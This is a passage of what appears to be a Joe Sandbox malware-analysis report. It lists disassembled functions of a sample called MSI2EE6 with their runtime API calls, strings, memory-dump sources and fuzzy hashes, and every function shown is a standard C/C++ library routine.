                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3messages
                                                                          • String ID:
                                                                          • API String ID: 50917705-0
                                                                          • Opcode ID: f319d0a74f0c553e1f7b874388fbc4b6b03d7a9233fd8ca41e1fcd90d8cb0555
                                                                          • Instruction ID: 90642d1742d5951a3a7cef411c3d3a1994dbfa0a78850cbc4b5684a80a6300d5
                                                                          • Opcode Fuzzy Hash: f319d0a74f0c553e1f7b874388fbc4b6b03d7a9233fd8ca41e1fcd90d8cb0555
                                                                          • Instruction Fuzzy Hash: B2F0B43681014A9BCB09F7A0CA22BBE3365AF50324F644919F511AB2D1DF349E05C781
                                                                          APIs
                                                                          • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00B18933,?,00000001,?,?,?,00B17A78,?,?,00000000), ref: 00B197CE
                                                                          • GetLastError.KERNEL32(?,00B18933,?,00000001,?,?,?,00B17A78,?,?,00000000,?,?,?,00B17FFF,?), ref: 00B197DA
                                                                            • Part of subcall function 00B197A0: CloseHandle.KERNEL32(FFFFFFFE,00B197EA,?,00B18933,?,00000001,?,?,?,00B17A78,?,?,00000000,?,?), ref: 00B197B0
                                                                          • ___initconout.LIBCMT ref: 00B197EA
                                                                            • Part of subcall function 00B19761: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00B19790,00B18920,?,?,00B17A78,?,?,00000000,?), ref: 00B19774
                                                                          • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00B18933,?,00000001,?,?,?,00B17A78,?,?,00000000,?), ref: 00B197FF
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                          • String ID:
                                                                          • API String ID: 2744216297-0
                                                                          • Opcode ID: fec17016e668bddc77f808cef58cdc779ae35aa7585f2351be5cf9285c6fa5df
                                                                          • Instruction ID: e2118e1b49b419b3752a9622a81716b9a486c87391b567526905d45d201f4b56
                                                                          • Opcode Fuzzy Hash: fec17016e668bddc77f808cef58cdc779ae35aa7585f2351be5cf9285c6fa5df
                                                                          • Instruction Fuzzy Hash: 53F01C36401165BBCF222F95DC099C93FA6FF093A1B958450FE2996120DA32C860EB91
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00AEABCC
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AEABD6
                                                                            • Part of subcall function 00ADC020: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC050
                                                                            • Part of subcall function 00ADC020: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC078
                                                                          • moneypunct.LIBCPMT ref: 00AEAC10
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AEAC47
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3moneypunct
                                                                          • String ID:
                                                                          • API String ID: 3160146232-0
                                                                          • Opcode ID: e1c48af68bd2b67905df98f89cbc0e4ed02a292eb56efc81a6ed4e2eeff00d32
                                                                          • Instruction ID: 45058b545a0a8b3d8c46c0504dd1ae0be2e890c2f93d1ddd0e40dfda3c421f2f
                                                                          • Opcode Fuzzy Hash: e1c48af68bd2b67905df98f89cbc0e4ed02a292eb56efc81a6ed4e2eeff00d32
                                                                          • Instruction Fuzzy Hash: E2F0A03591025A9BCB05FBE0CB62BBF7779AF60354F644408F501AB282DF349E04C791
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: H_prolog3___cftoe
                                                                          • String ID: !%x
                                                                          • API String ID: 855520168-1893981228
                                                                          • Opcode ID: f92b3224395bf9ba9d31c70fa2a7dd8296152a47c6af5d60bbce94c683ca118a
                                                                          • Instruction ID: 07a577ab0e284e81f2964c5cd6e810e25e40010f64ae616cc28540da15aa17a3
                                                                          • Opcode Fuzzy Hash: f92b3224395bf9ba9d31c70fa2a7dd8296152a47c6af5d60bbce94c683ca118a
                                                                          • Instruction Fuzzy Hash: 5F712671D0021CAFDF18EFA8E981AEEB7B5EF48304F10452AF516A7251EB35AE41CB50
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: H_prolog3___cftoe
                                                                          • String ID: !%x
                                                                          • API String ID: 855520168-1893981228
                                                                          • Opcode ID: 202ab52caadc108cd2af9ecbdf224af90d9e79b88446b2df5e2ca9e7dfafbe3e
                                                                          • Instruction ID: 9c77e3ed8f5b226e0f680739c7be49cc908d6366620129cf034f5c729e847d60
                                                                          • Opcode Fuzzy Hash: 202ab52caadc108cd2af9ecbdf224af90d9e79b88446b2df5e2ca9e7dfafbe3e
                                                                          • Instruction Fuzzy Hash: EA715871E0121CAFDF14EFA8D880AEEB7B5AF08344F14452AF955E7342EA35A945CB50
                                                                          APIs
                                                                          • __EH_prolog3_GS.LIBCMT ref: 00AF36F7
                                                                          • _swprintf.LIBCMT ref: 00AF376F
                                                                            • Part of subcall function 00AEA7B2: __EH_prolog3.LIBCMT ref: 00AEA7B9
                                                                            • Part of subcall function 00AEA7B2: std::_Lockit::_Lockit.LIBCPMT ref: 00AEA7C3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: H_prolog3H_prolog3_LockitLockit::__swprintfstd::_
                                                                          • String ID: %.0Lf
                                                                          • API String ID: 3614004578-1402515088
                                                                          • Opcode ID: d87da683ba61cc644413eafc00ab04a99bdd061fd4a3f5bbc29e6c930e89dff4
                                                                          • Instruction ID: c49b6c7ee9b133398aa5d184f5549d646f1c19eca3d9e82a1fda98bf73f37d93
                                                                          • Opcode Fuzzy Hash: d87da683ba61cc644413eafc00ab04a99bdd061fd4a3f5bbc29e6c930e89dff4
                                                                          • Instruction Fuzzy Hash: 3F618EB2D00218AFCF05EFE4C944AEDBBB9FF48300F104559F512AB291EB359A45CB90
                                                                          APIs
                                                                          • __EH_prolog3_GS.LIBCMT ref: 00AF3A27
                                                                          • _swprintf.LIBCMT ref: 00AF3A9F
                                                                            • Part of subcall function 00ADB810: std::_Lockit::_Lockit.LIBCPMT ref: 00ADB83D
                                                                            • Part of subcall function 00ADB810: std::_Lockit::_Lockit.LIBCPMT ref: 00ADB860
                                                                            • Part of subcall function 00ADB810: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADB888
                                                                            • Part of subcall function 00ADB810: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADB931
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                          • String ID: %.0Lf
                                                                          • API String ID: 1487807907-1402515088
                                                                          • Opcode ID: 70dffb79dd7c9b7d9049de740d4df0622276b679fce3a6b216d5691c7e3c17d5
                                                                          • Instruction ID: b0e391220235d6a1203e8e9f21be7855dd4b11cff132bd2ef5b9ca88d1560ef2
                                                                          • Opcode Fuzzy Hash: 70dffb79dd7c9b7d9049de740d4df0622276b679fce3a6b216d5691c7e3c17d5
                                                                          • Instruction Fuzzy Hash: 63618D72D0021CABCF05EFE4D984AEDBBB9FF48340F10451AE552AB295EB359A45CB90
                                                                          APIs
                                                                          • __EH_prolog3_GS.LIBCMT ref: 00AF8307
                                                                          • _swprintf.LIBCMT ref: 00AF837F
                                                                            • Part of subcall function 00ADC8E0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC90D
                                                                            • Part of subcall function 00ADC8E0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC930
                                                                            • Part of subcall function 00ADC8E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC958
                                                                            • Part of subcall function 00ADC8E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADCA01
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                          • String ID: %.0Lf
                                                                          • API String ID: 1487807907-1402515088
                                                                          • Opcode ID: 7b0ec01d8e677fd70770fd3e10acbedfbcc690dedb82d299e0723ab09cc85a38
                                                                          • Instruction ID: 8373ff0a359139f238a58e34dcd272257fe7112c094280cd1b3f66bab4f3d927
                                                                          • Opcode Fuzzy Hash: 7b0ec01d8e677fd70770fd3e10acbedfbcc690dedb82d299e0723ab09cc85a38
                                                                          • Instruction Fuzzy Hash: 7E617D71D0021DABCF09DFE4C885AEDBBB9FF48340F10451AF516AB291DB399945CB90
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: __aulldiv
                                                                          • String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
                                                                          • API String ID: 3732870572-1956417402
                                                                          • Opcode ID: 104f3964e35b257bdffbcbb5c0ee384a0875f65344d709019ed608cf1c33200f
                                                                          • Instruction ID: 607e236805c4cd662d441272ce25edaf3ab7cf984c5a219d9ebadb334b055c65
                                                                          • Opcode Fuzzy Hash: 104f3964e35b257bdffbcbb5c0ee384a0875f65344d709019ed608cf1c33200f
                                                                          • Instruction Fuzzy Hash: 3D51E270A0524DABCF249FEDC8917BEBBF5AF45340F1440AAF691D7241CA7C9942CB60
                                                                          APIs
                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00ADFFAC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: Concurrency::cancel_current_task
                                                                          • String ID: false$true
                                                                          • API String ID: 118556049-2658103896
                                                                          • Opcode ID: f53b52189151f8f47eebb9e482d05f16c70fc097e66378bd0f176192debe5ed8
                                                                          • Instruction ID: bcbffad11ea82bfe230f5a2b0d0fcb20524162da49ce885836a33e16b4ae68fc
                                                                          • Opcode Fuzzy Hash: f53b52189151f8f47eebb9e482d05f16c70fc097e66378bd0f176192debe5ed8
                                                                          • Instruction Fuzzy Hash: 9751C7B1D003489FDB10DFA4C941BEEB7F8FF49304F14826AE846AB251EB75A985CB51
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: \\?\$\\?\UNC\
                                                                          • API String ID: 0-3019864461
                                                                          • Opcode ID: 4b376733b0084854755c3d67e4a8b6aec86944c670d9439c02a46461436ef09a
                                                                          • Instruction ID: 0776927040bfe6f8b399d5f610625bc98707abf60886b97a65901c65dc8e708c
                                                                          • Opcode Fuzzy Hash: 4b376733b0084854755c3d67e4a8b6aec86944c670d9439c02a46461436ef09a
                                                                          • Instruction Fuzzy Hash: 6D519CB1E002049BDB24CF68C955BAEB7F4FF54304F10461EE456B7790DB75AA89CB90
                                                                          APIs
                                                                          • EncodePointer.KERNEL32(00000000,?), ref: 00AFD36B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: EncodePointer
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 2118026453-2084237596
                                                                          • Opcode ID: 0f75fbb6f55c6be8e96e285bf50580be1afd2747b08533cb7dfa838f7af5d263
                                                                          • Instruction ID: 6b1e3d5de9a59d0e6b41a9c932fbbd518a103b517fc758a822d117cd035c71ee
                                                                          • Opcode Fuzzy Hash: 0f75fbb6f55c6be8e96e285bf50580be1afd2747b08533cb7dfa838f7af5d263
                                                                          • Instruction Fuzzy Hash: 0541387290020DAFCF16DF98CD81AEEBBB6BF48301F148159FA18A7261D335A951DB51
                                                                          APIs
                                                                          • __EH_prolog3_GS.LIBCMT ref: 00AF81D7
                                                                            • Part of subcall function 00ADC8E0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC90D
                                                                            • Part of subcall function 00ADC8E0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC930
                                                                            • Part of subcall function 00ADC8E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC958
                                                                            • Part of subcall function 00ADC8E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADCA01
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3_
                                                                          • String ID: 0123456789-$0123456789-
                                                                          • API String ID: 2088892359-2494171821
                                                                          • Opcode ID: 6391e3723d2edfc666fad60de6f3f9ad89916a2ffb4d363367dc83567edddbf5
                                                                          • Instruction ID: 13ca3ba6597692c46a6801b4bd8088a807c874731414fdeb446f5e1e31f06228
                                                                          • Opcode Fuzzy Hash: 6391e3723d2edfc666fad60de6f3f9ad89916a2ffb4d363367dc83567edddbf5
                                                                          • Instruction Fuzzy Hash: B941673190011DAFCF15EFE4D9819EEBBB5AF08310F10005AFA21AB252DB34AA05DB51
                                                                          APIs
                                                                          • __EH_prolog3_GS.LIBCMT ref: 00AF35C7
                                                                            • Part of subcall function 00AEA7B2: __EH_prolog3.LIBCMT ref: 00AEA7B9
                                                                            • Part of subcall function 00AEA7B2: std::_Lockit::_Lockit.LIBCPMT ref: 00AEA7C3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: H_prolog3H_prolog3_LockitLockit::_std::_
                                                                          • String ID: %.0Lf$0123456789-
                                                                          • API String ID: 79917597-3094241602
                                                                          • Opcode ID: b83a15c8ad7b59197710dea000262acd9df24dca532632abc8b30b5014a7cfb1
                                                                          • Instruction ID: bc94725eabe2c7da02bc78c64565660298cc0bbd14359665f8f38050cf4f2f49
                                                                          • Opcode Fuzzy Hash: b83a15c8ad7b59197710dea000262acd9df24dca532632abc8b30b5014a7cfb1
                                                                          • Instruction Fuzzy Hash: A441473290115DAFCF55EFE8C9819EEBBB5BF08310F10016AFA15AB251DB309A56CB91
                                                                          APIs
                                                                          • __EH_prolog3_GS.LIBCMT ref: 00AF38F7
                                                                            • Part of subcall function 00ADB810: std::_Lockit::_Lockit.LIBCPMT ref: 00ADB83D
                                                                            • Part of subcall function 00ADB810: std::_Lockit::_Lockit.LIBCPMT ref: 00ADB860
                                                                            • Part of subcall function 00ADB810: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADB888
                                                                            • Part of subcall function 00ADB810: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADB931
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3_
                                                                          • String ID: 0123456789-$0123456789-
                                                                          • API String ID: 2088892359-2494171821
                                                                          • Opcode ID: d55bc364ae29f4e602c3f25e8cb4e3e8b9b9ca8d51b3e93681db03ef29276ec5
                                                                          • Instruction ID: d79d62c098e26d3865804def39b4ac25c129a87dcbd34dd59cc11de07bd0eacf
                                                                          • Opcode Fuzzy Hash: d55bc364ae29f4e602c3f25e8cb4e3e8b9b9ca8d51b3e93681db03ef29276ec5
                                                                          • Instruction Fuzzy Hash: EE41273290012DDFCF15EFE8C9919EEBBB5BF08310F10415AFA12AB251DBB09A55CB95
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: _swprintf
                                                                          • String ID: %$+
                                                                          • API String ID: 589789837-2626897407
                                                                          • Opcode ID: 003a93df830ce1187e27f2ba2d97464c451ba55335c1aa2892d8af57d1d88946
                                                                          • Instruction ID: 1d3eb0536a17ea5b4c581fcc26bd9122372cbef9292a3801899cd7f4f627b498
                                                                          • Opcode Fuzzy Hash: 003a93df830ce1187e27f2ba2d97464c451ba55335c1aa2892d8af57d1d88946
                                                                          • Instruction Fuzzy Hash: 072138720082459FD715CF18CC85BDBBBE9AF49304F04851AF9554B3A2D735D91CC7A2
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: _swprintf
                                                                          • String ID: %$+
                                                                          • API String ID: 589789837-2626897407
                                                                          • Opcode ID: 2066b08d0cef99902dd89842ca97b7fd8d3120bfe9b7cb0db52387f1ba47275b
                                                                          • Instruction ID: 48994246aa431f0c852334014573808c3c34a2281e40cfbc891a33cac1c43e06
                                                                          • Opcode Fuzzy Hash: 2066b08d0cef99902dd89842ca97b7fd8d3120bfe9b7cb0db52387f1ba47275b
                                                                          • Instruction Fuzzy Hash: 552129711183849FD715CF68CC45B9B7BEAABC5314F04851EF98687341C775E90ACBA2
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: _swprintf
                                                                          • String ID: %$+
                                                                          • API String ID: 589789837-2626897407
                                                                          • Opcode ID: 25ca4d4aacc54caef8cd798000d52478b77abc8779c6eb69b4d111ab7ec3ec01
                                                                          • Instruction ID: f9f936178e705e5005f6cbb25a44993ace4635afb9654cf76a04dd5093723171
                                                                          • Opcode Fuzzy Hash: 25ca4d4aacc54caef8cd798000d52478b77abc8779c6eb69b4d111ab7ec3ec01
                                                                          • Instruction Fuzzy Hash: 0221F5711083449FD711CF68CC85B9BBBE9AB85318F14851EF99587341C735D91ACBA2
                                                                          APIs
                                                                          • ConvertSidToStringSidW.ADVAPI32(?,00000000), ref: 00AD8356
